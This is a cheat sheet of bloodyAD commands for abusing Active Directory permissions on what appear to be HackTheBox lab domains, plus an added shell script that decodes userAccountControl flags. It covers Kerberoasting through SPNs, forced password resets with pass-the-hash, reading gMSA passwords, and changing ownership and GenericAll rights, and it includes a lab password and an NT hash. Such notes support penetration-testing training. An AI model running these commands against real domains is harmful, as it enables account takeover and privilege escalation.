BloodyAD
WriteSPN: set a servicePrincipalName on the target user (makes it Kerberoastable)
└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u henry -p 'H3nry_987TGV!' set object 'Alfred' servicePrincipalName -v 'anurag/htb'
[+] Alfred's servicePrincipalName has been updated
To list the objects your user can write to (add --detail to see which attributes/rights)
bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable --detail
OR
bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable
OR, authenticating with Kerberos (-k, ticket taken from KRB5CCNAME) as a service account
bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'Mirage-Service$' -k get writable
To add/remove a group member (syntax: groupMember <group> <member>)
└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS add groupMember Infrastructure 'Alfred'
[+] Alfred added to Infrastructure
└─$ bloodyAD -d $DOMAIN --host $TARGET --dc-ip $IP -u $USER -p $PASS remove groupMember "Protected Objects" "IT"
[-] IT removed from Protected Objects
To read a gMSA managed password (needs ReadGMSAPassword on the account)
└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS get object --resolve-sd 'ansible_dev$' --attr msDS-ManagedPassword
ForceChangePassword: reset the target's password without knowing the old one (syntax: set password <target> <newpass>; -p :$HASH is pass-the-hash)
└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p :$HASH set password sam 'P@ssw0rd@123'
Change the owner (syntax: set owner <target> <new owner>; below, sam becomes the owner of john)
└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS set owner john sam
Give GenericAll rights (syntax: add genericAll <target> <trustee>; below, Alfred gets GenericAll over John)
bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS add genericAll John Alfred
To check whether the account is disabled (ACCOUNTDISABLE bit in userAccountControl)
└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS -k get object $USER_TO_CHECK --attr userAccountControl
To clear the ACCOUNTDISABLE flag (enable the account)
└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS -k remove uac $USER_TO_CHECK -f ACCOUNTDISABLE
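The two commands above read and clear userAccountControl flags. When the attribute comes back as a raw integer (as it does from ldapsearch or older tooling) it has to be decoded by hand; the helper below is an added example, not part of bloodyAD or of the original notes. The bit values are the standard ADS_USER_FLAG_ENUM constants, and 514 (NORMAL_ACCOUNT + ACCOUNTDISABLE) is a sample value constructed for the example.

```shell
#!/bin/sh
# Added example: decode a raw userAccountControl integer into flag names
# and test the bits that matter during an AD engagement.

# Print the flag names set in $1 (decimal userAccountControl), lowest bit first.
uac_flags() {
    val=$1
    out=""
    for entry in \
        1:SCRIPT 2:ACCOUNTDISABLE 8:HOMEDIR_REQUIRED 16:LOCKOUT \
        32:PASSWD_NOTREQD 64:PASSWD_CANT_CHANGE 128:ENCRYPTED_TEXT_PWD_ALLOWED \
        256:TEMP_DUPLICATE_ACCOUNT 512:NORMAL_ACCOUNT 2048:INTERDOMAIN_TRUST_ACCOUNT \
        4096:WORKSTATION_TRUST_ACCOUNT 8192:SERVER_TRUST_ACCOUNT \
        65536:DONT_EXPIRE_PASSWORD 131072:MNS_LOGON_ACCOUNT 262144:SMARTCARD_REQUIRED \
        524288:TRUSTED_FOR_DELEGATION 1048576:NOT_DELEGATED 2097152:USE_DES_KEY_ONLY \
        4194304:DONT_REQ_PREAUTH 8388608:PASSWORD_EXPIRED \
        16777216:TRUSTED_TO_AUTH_FOR_DELEGATION 67108864:PARTIAL_SECRETS_ACCOUNT
    do
        bit=${entry%%:*}
        name=${entry#*:}
        if [ $(( val & bit )) -ne 0 ]; then
            out="$out $name"
        fi
    done
    printf '%s\n' "${out# }"
}

# Exit status 0 when the ACCOUNTDISABLE bit (0x2) is set: the account
# needs "remove uac <user> -f ACCOUNTDISABLE" before it can log on.
uac_is_disabled() {
    [ $(( $1 & 2 )) -ne 0 ]
}

# Exit status 0 when DONT_REQ_PREAUTH (0x400000) is set: AS-REP roastable.
uac_no_preauth() {
    [ $(( $1 & 4194304 )) -ne 0 ]
}

# Usage: sh uac.sh 514  (constructed sample value; defaults to 514)
uac_flags "${1:-514}"
```

Run it on the integer you got back; if uac_is_disabled succeeds, the "remove uac" command above is the fix, and a DONT_REQ_PREAUTH hit means the account can be AS-REP roasted without any write access at all.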
Set an SPN using Kerberos auth with an NT hash (-f rc4 tells bloodyAD the -p value is an RC4/NT hash)
└─$ bloodyAD -d vintage.htb -k --host dc01.vintage.htb -u 'GMSA01$' -p 5008d30496b4c5069ce1fc187b5b5960 -f rc4 set object svc_ldap servicePrincipalName -v 'http/whateverldap'